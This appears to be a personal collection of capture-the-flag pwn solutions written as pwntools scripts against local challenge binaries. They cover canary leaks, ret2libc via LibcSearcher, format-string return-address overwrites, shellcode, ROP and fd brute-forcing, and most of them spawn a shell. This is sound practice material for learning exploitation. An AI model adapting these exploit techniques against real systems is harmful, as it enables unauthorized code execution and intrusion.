水题都没收录，只收有收获的

canary

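from pwn import *
from LibcSearcher import *

# Three-stage stack-overflow exploit against a binary with a stack canary.
#   Stage 1: leak the canary and the saved rbp through the "name" buffer.
#            The canary's lowest byte is 0x00 (it doubles as a string
#            terminator); clobbering that byte with a marker lets the
#            program's own output run past it and print the other 7 bytes
#            plus the saved rbp that follows.
#   Stage 2: ret2plt puts(puts@got) to leak a libc address, return into
#            `vuln` for a second overflow.
#   Stage 3: system("/bin/sh") with a libc base resolved by LibcSearcher.
context.log_level = "debug"
elf = ELF("pwn")
p = remote("0.0.0.0", 33909)
#p = process("./pwn")

MARKER = 0xcc            # byte that replaces the canary's NUL terminator
BUF_TO_CANARY = 0x50 - 8  # 0x48 bytes of buffer before the canary slot

# Bytes literals everywhere a raw byte is matched: a str such as "\xcc" is
# re-encoded by pwntools according to context.encoding before comparison,
# and only a bytes literal is guaranteed to match the exact byte on the wire.
payload = b'a' * BUF_TO_CANARY + p8(MARKER)
p.sendafter(b"name", payload)
p.recvuntil(p8(MARKER))

# Put the NUL low byte back; the remaining 7 canary bytes come off the wire.
canary = p8(0) + p.recvn(7)
# The saved rbp follows the canary; keep the 6 significant bytes of the
# pointer and zero-extend to 8.
# NOTE(review): assumes the leaked pointer's top byte is 0x7f (usual for
# x86-64 userspace); a different address range needs another delimiter.
old_rbp = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
print(hex(old_rbp))
print(canary)

vuln = 0x00000000040121B          # re-entry point for the second overflow
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
pop_rdi_ret = 0x0000000000401343
ret = 0x40101a                    # lone `ret` gadget (stack re-alignment)

# Stage 2: puts(puts@got) prints the resolved address of puts, then the
# chain returns into `vuln` so the buffer can be overflowed once more. The
# canary is written back unchanged so the stack-protector check passes.
payload1 = (b'a' * BUF_TO_CANARY + canary + p64(old_rbp + 0x10)
            + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(vuln))
p.sendlineafter(b"stack!", payload1)

puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
print(hex(puts_addr))

# Resolve system and "/bin/sh" relative to the leaked puts. LibcSearcher
# may match more than one libc build; if the shell never appears, check
# which candidate it picked before suspecting the chain.
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')

# Stage 3: second overflow -> system("/bin/sh"). The extra `ret` before
# system is the usual fix for the 16-byte stack alignment glibc's system()
# expects at call time.
p.sendlineafter(b"name", b'1')
payload2 = (b'a' * BUF_TO_CANARY + canary + p64(old_rbp)
            + p64(pop_rdi_ret) + p64(binsh_addr) + p64(ret) + p64(system_addr))
p.sendlineafter(b"stack", payload2)

p.interactive()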

fmt3

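from pwn import *

# format_level3: chained single-byte format-string writes.
#   %6$hhn  writes one byte through the stack pointer held in slot 6 (the
#           saved ebp, which points at slot 14), i.e. it retargets the
#           value sitting in slot 14;
#   %14$hhn writes one byte through slot 14, i.e. at the retargeted address.
# Four rounds of (point slot 14 at ret+i, store byte i of `success`) patch
# the saved return address; a last round restores slot 14 to the original
# ebp so the frame is sane when the function returns.
p = remote("0", 36043)
#p=process("./format_level3")
context(log_level="debug", arch="i386", os="linux")

PTR_SLOT = 6      # %6$  : pointer to slot 14 (saved-ebp chain)
TARGET_SLOT = 14  # %14$ : holds the address the byte is written to
success = 0x08049317


def talk(fmt: bytes) -> None:
    """Pick menu option 3 and submit one format string."""
    p.sendlineafter(b"Your choice:", b'3')
    p.sendlineafter(b"Input what you want to talk:", fmt)


def write_byte(slot: int, value: int) -> bytes:
    """Format string that stores `value & 0xff` via `%<slot>$hhn`.

    `%Nc` pads the output to N characters so hhn stores N mod 256. The value
    is reduced mod 256 first: a negative width (`%-3c`) or one above 255
    prints the wrong count. A value of 0 gets no padding at all, because
    `%0c` still emits one character and would store 1 instead of 0.
    """
    value %= 0x100
    pad = b"%%%dc" % value if value else b""
    return pad + b"%%%d$hhn" % slot


# Leak the saved ebp (slot 14) to locate the return-address slot above it.
talk(b'%14$x')
p.recvuntil(b":")
p.recvline()
old_ebp = int(p.recvline().strip(), 16)
print(hex(old_ebp))

# The return address sits 4 bytes above the saved ebp (i386 frame layout);
# the two stack constants in the original expression differed by exactly 4.
ret = old_ebp + 4
ret_low = ret & 0xff

# NOTE(review): %6$hhn only changes the LOW byte of the slot-14 pointer, so
# ret..ret+3 must not cross a 256-byte boundary relative to old_ebp. If the
# leaked ret has low byte > 0xfc the carry is lost and the writes land
# 256 bytes too low; re-run for a different stack layout in that case.
for i in range(4):
    talk(write_byte(PTR_SLOT, ret_low + i))                  # slot 14 -> ret+i
    talk(write_byte(TARGET_SLOT, (success >> (8 * i)) & 0xff))  # *(ret+i)

# Restore slot 14 to old_ebp (= ret - 4) so the epilogue sees the original
# frame pointer; same menu/input sequence as talk(), split so the debugger
# can be attached in between.
restore = write_byte(PTR_SLOT, ret_low - 4)
p.sendlineafter(b"Your choice:", b'3')
attach(p)  # debugging aid; only meaningful when the target runs locally
p.sendlineafter(b"Input what you want to talk:", restore)

# Option 4 presumably leaves the menu loop, so the patched return address
# is used and control lands in `success`.
p.sendlineafter(b"Your choice:", b'4')

p.interactive()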

验证加法

from pwn import *

# "Verify addition": the service prints 100 rounds of "a + b = c" and we
# answer whether the equation holds ("BlackBird") or not ("WingS").
p = remote("0.0.0.0", 38073)


def _read_equation():
    """Consume one round's prompt and return (a, b, c) as ints.

    int() on the raw bytes tolerates the surrounding whitespace/newline.
    """
    p.recvuntil("The second:")
    p.recvline()
    lhs_a = p.recvuntil("+")[:-1]
    lhs_b = p.recvuntil("=")[:-1]
    rhs = p.recvline()
    return int(lhs_a), int(lhs_b), int(rhs)


for _round in range(100):
    a, b, c = _read_equation()
    p.sendline("BlackBird" if a + b == c else "WingS")
p.interactive()

爆破fd

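from pwn import *

# Brute-force the file descriptor the service reads from: for each candidate
# fd open a fresh connection, answer the prompt and print the reply. fds 0-2
# are stdio, so the search starts at 3.
context.log_level = "debug"
for fd in range(3, 1024):
    p = remote("0.0.0.0", 34063)
    try:
        p.recvuntil(b"Please input its fd:")
        p.sendline(str(fd).encode())
        p.recvline()
        # Tag the output with the fd so the hit can be found in the log.
        print(fd, p.recvline())
    except EOFError:
        # The service hung up on this fd (e.g. read() failed); keep going.
        print(fd, "EOF")
    finally:
        # Every round opens a new socket. Without closing them the attacking
        # host accumulates ~1000 open connections and can run into its own
        # descriptor limit before the loop finishes.
        p.close()
# No interactive session at the end: every connection has been consumed and
# closed by the loop above; the interesting reply is in the printed output.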

汇编跳转

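from pwn import *

context(log_level="debug", arch="amd64", os="linux")
p = remote("0.0.0.0", 39125)
#p=process("./shellcode_level3")#4011D6

# Only 5 bytes of input get executed, which is exactly one `jmp rel32`
# (E9 + 32-bit displacement). The displacement is relative to the end of
# the jmp, i.e. to SHELL_ADDR + 5.
SHELL_ADDR = 0x404089   # where the 5 input bytes are placed and run
TARGET = 0x4011D6       # function to land in


def jmp_rel32(src: int, dst: int) -> bytes:
    """Encode `jmp dst` for a 5-byte E9 jump located at `src`.

    The displacement is taken mod 2**32 so a backward jump is emitted as
    its two's-complement little-endian form.
    """
    return p8(0xE9) + p32((dst - (src + 5)) & 0xffffffff)


# Computed rather than hand-assembled: for 0x404089 -> 0x4011D6 this is
# e9 48 d1 ff ff, the same bytes the original hard-coded.
shell = jmp_rel32(SHELL_ADDR, TARGET)

# sendline appends '\n', so 6 bytes go out; the target evidently only runs
# the first 5, so the newline is harmless here. Use send() if it is not.
p.sendlineafter(b"5 bytes ni neng miao sha wo?", shell)

p.interactive()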

要命的格式化字符串

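from pwn import *

# format_level2: direct format-string write. The payload starts with the
# 4-byte target address, which ends up as format argument number `offset`;
# `%Nc` then pads the output so `%<offset>$hhn` stores (4 + N) & 0xff there.
# Two single-byte writes patch the low 16 bits of the saved return address.
p = remote("0", 37699)
#p=process("./format_level2")
context(log_level="debug", arch="i386", os="linux")

offset = 7  # format-argument index at which our 4-byte address lands
# Address the return slot is patched to. Its low two bytes (0x17, 0x93) are
# what the original hard-coded widths wrote (19 -> 0x17, 143 -> 0x93); the
# upper bytes already match the existing return address and are left alone.
success = 0x08049317

p.sendlineafter(b"Your choice:", b'3')
p.sendlineafter(b"Input what you want to talk:", b'%14$x')
p.recvuntil(b":")
p.recvline()
old_ebp = int(p.recvline().strip(), 16)
print(hex(old_ebp))

# The return address sits 4 bytes above the saved ebp (i386 frame layout);
# the two stack constants in the original expression differed by exactly 4.
ret = old_ebp + 4


def write_byte(addr: int, value: int) -> bytes:
    """Format string that stores `value & 0xff` at `addr` via %hhn.

    The 4-byte address is printed before the width directive, so the pad
    width is (value - 4) mod 256. A width of 0 is omitted because `%0c`
    still prints one character.
    """
    pad = (value - 4) % 0x100
    body = b"%%%dc" % pad if pad else b""
    return p32(addr) + body + b"%%%d$hhn" % offset


def talk(fmt: bytes) -> None:
    """Pick menu option 3 and submit one format string."""
    p.sendlineafter(b"Your choice:", b'3')
    p.sendlineafter(b"Input what you want to talk:", fmt)


talk(write_byte(ret, success & 0xff))             # ret[0] = 0x17
talk(write_byte(ret + 1, (success >> 8) & 0xff))  # ret[1] = 0x93
# Option 4 presumably leaves the menu loop, so the patched return is used.
p.sendlineafter(b"Your choice:", b'4')
p.interactive()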

shellcode

from pwn import *

p = remote("0", 43007)
#p=process("./shellcode")
context(log_level="debug", arch="amd64", os="linux")

# Self-patching execve("/bin/sh") stub. The two `mov byte ptr [rax], ...`
# stores write 0f 05 (`syscall`) at rax+0x21 / rax+0x22, which by the
# author's arithmetic is the position right after `cdq`, so the input never
# has to contain the syscall opcode itself. rsi = 0 (argv), rdx = 0 via cdq
# (rax is positive), rax = 59 (execve), rdi -> the "/bin/sh" appended below.
# NOTE(review): this relies on rax pointing at the start of the buffer when
# execution begins and on rsp+0x29 (after the push) being the "/bin/sh"
# string; both are properties of the target binary, confirm before reuse.
SHELLCODE_SRC = '''
add rax,0x21
mov byte ptr [rax], 0xf
add rax,1
mov byte ptr [rax], 0x5
xor rsi, rsi
push rsi
mov rdi,rsp
add rdi,0x29
mov rax,59
cdq

'''

# "/bin/sh" goes out without a trailing NUL: execve needs a terminated path,
# so this depends on the byte following the payload already being 0x00.
payload = asm(SHELLCODE_SRC) + b'/bin/sh'
attach(p)  # debugging aid; only meaningful when the target runs locally
p.sendafter("shellcode:", payload)

p.interactive()

repwn

from pwn import *

p = remote("0", 44853)
#p=process("./rePWNse")
action = 0x0000000000401296   # function returned into after the gadget
pop_rdi = 0x000000000040168E  # `pop rdi; ret` gadget

# The program asks for seven single digits, one per line; 1 9 1 9 8 1 0 is
# the sequence the author found to satisfy the check. The short pause
# between lines keeps each digit in its own read().
DIGITS = b"1919810"
p.sendlineafter("Input seven single digits:", DIGITS[:1])
for digit in DIGITS[1:]:
    sleep(0.1)
    p.sendline(bytes([digit]))

# Skip two lines, then take the 8 hex characters just before the newline:
# an address the program prints, presumably a "/bin/sh" string, passed
# as the rdi argument below.
p.recvline()
p.recvline()
leak = p.recvline()[-9:-1]
sh_addr = int(leak, 16)
print(hex(sh_addr))

# 0x48 bytes of padding up to the saved return address, then
# pop rdi <- sh_addr and return into `action`.
payload = b'a' * 0x48 + p64(pop_rdi) + p64(sh_addr) + p64(action)
p.sendlineafter("What do you want?", payload)
p.interactive()